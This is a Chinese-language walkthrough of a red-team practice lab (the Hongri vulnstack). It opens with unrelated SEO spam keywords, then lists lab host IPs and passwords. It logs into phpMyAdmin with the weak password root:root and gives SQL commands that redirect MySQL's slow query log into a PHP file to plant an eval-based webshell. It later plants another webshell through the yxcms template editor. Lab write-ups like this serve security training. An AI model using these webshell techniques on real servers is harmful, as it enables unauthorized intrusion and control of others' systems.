房产网站建设价格,网站诊断示例,长春网站建设,seo全网推广营销软件一、准备工作
1、靶场搭建
靶场地址 靶场描述 靶场拓扑图 其他相关靶场搭建详情见靶场地址相关说明
2、靶场相关主机信息
后续打靶场的过程中#xff0c;如果不是短时间内完成#xff0c;可能ip会有变化
主机ip密码角色win7192.168.122.131hongrisec2019!边界服务器win…一、准备工作
1、靶场搭建
靶场地址 靶场描述 靶场拓扑图 其他相关靶场搭建详情见靶场地址相关说明
2、靶场相关主机信息
后续打靶场的过程中如果不是短时间内完成可能ip会有变化
主机ip密码角色win7192.168.122.131hongrisec2019!边界服务器win7192.168.52.143hongrisec2019!边界服务器win2008192.168.52.138hongrisec2019#域控win2003192.168.52.141hongrisec2019域成员kali192.168.122.128略攻击机1win11192.168.122.1略攻击机2
3、环境配置启动
启动win7的phpstudy win 7能通域内其他主机和互联网 win2008 不能通互联网
二、web渗透
1、IP及端口的探测
goby、nmap都可以
2、访问相关端口可以发现phpinfo页面 3、进一步进行目录爆破发现phpmyadmin目录
其他相关文章还写到扫出来了备份文件对后续文件上传拿到文件路径有帮助但是我这边没有扫出来和字典有关 4、通过弱口令登录phpmyadmin,弱口令root:root 5、先修改一下弱口令
如果是攻防赛中可以进行这一步这里有点多余了
6、百度大法,发现可以通过数据库写入webshell
phpMyAdmin 渗透利用总结 法一 直接往web目录下写入webshell 需要的条件a、有权限写 b、知道web目录绝对路径 查看当前数据库用户是否有写的权限
show variables like %secure%;secure-file-priv特性 secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 当secure_file_priv的值为null 表示限制mysql 不允许导入|导出 当secure_file_priv的值为/tmp/ 表示限制mysql 的导入|导出只能发生在/tmp/目录下 当secure_file_priv的值没有具体值时表示不对mysql 的导入|导出做限制 可以在mysql-ini文件中设置其属性 此处权限为默认NULL,不允许导入导出文件另寻他法 补充 如何设置这一属性
法二通过日志文件写入webshell 条件日志读写权限web目录的绝对路径 查看当前选项值
show global variables like %long_query_time%开启日志记录功能
set global general_log ON;查看当前日志文件
show variables like general%;指定日志文件相关路径phpinfo页面可以看到
set global general_log_file C:/phpStudy/WWW/zshell.php;无法设置日志文件另寻他法
法三
尝试通过慢日志写入webshell 慢日志一般都是通过long_query_time选项来设置这个时间值时间以秒为单位可以精确到微秒。如果查询时间超过了这个时间值默认为10秒这个查询语句将被记录到慢查询日志中。
查询当前慢查询日志目录
show variables like %slow%;开启慢查询日志记录功能
set GLOBAL slow_query_logon;指定慢查询日志文件 这里就可以成功为啥上面不能成功
set GLOBAL slow_query_log_fileC:/phpStudy/WWW/zshell.php;向慢查询日志中写入phpinfo页面
select ?php phpinfo();? or sleep(11);查看该日志文件可以成功被解析 进一步写入webshell
set GLOBAL slow_query_log_fileC:/phpStudy/WWW/shell.php;
select ?php eval($_POST[cmd]);? or sleep(11);用蚁剑成功连接webshell 至此通过phpmyadmin获取到了web服务器的相关权限
http服务和数据库肯定是为网站服务的 发现数据库中存在newyxcms数据库搜索相关信息可以在网上发现源码和相关漏洞
7、访问相关web页面进一步挖掘漏洞
前面修改了数据库的密码导致访问报错又重新修改了密码
http://192.168.122.131/yxcms/ 通过公告信息进入后台默认弱口令 前台模板管理处新建模板文件写入webshell进行漏洞利用 webshell 路径可以在公开源码中查看相关文件获取也可以通过前面扫出来的网站源码获取此处的版本和靶机cms的版本不同但是文件路径一样最好找相同版本的源码 通过蚁剑连接webshell 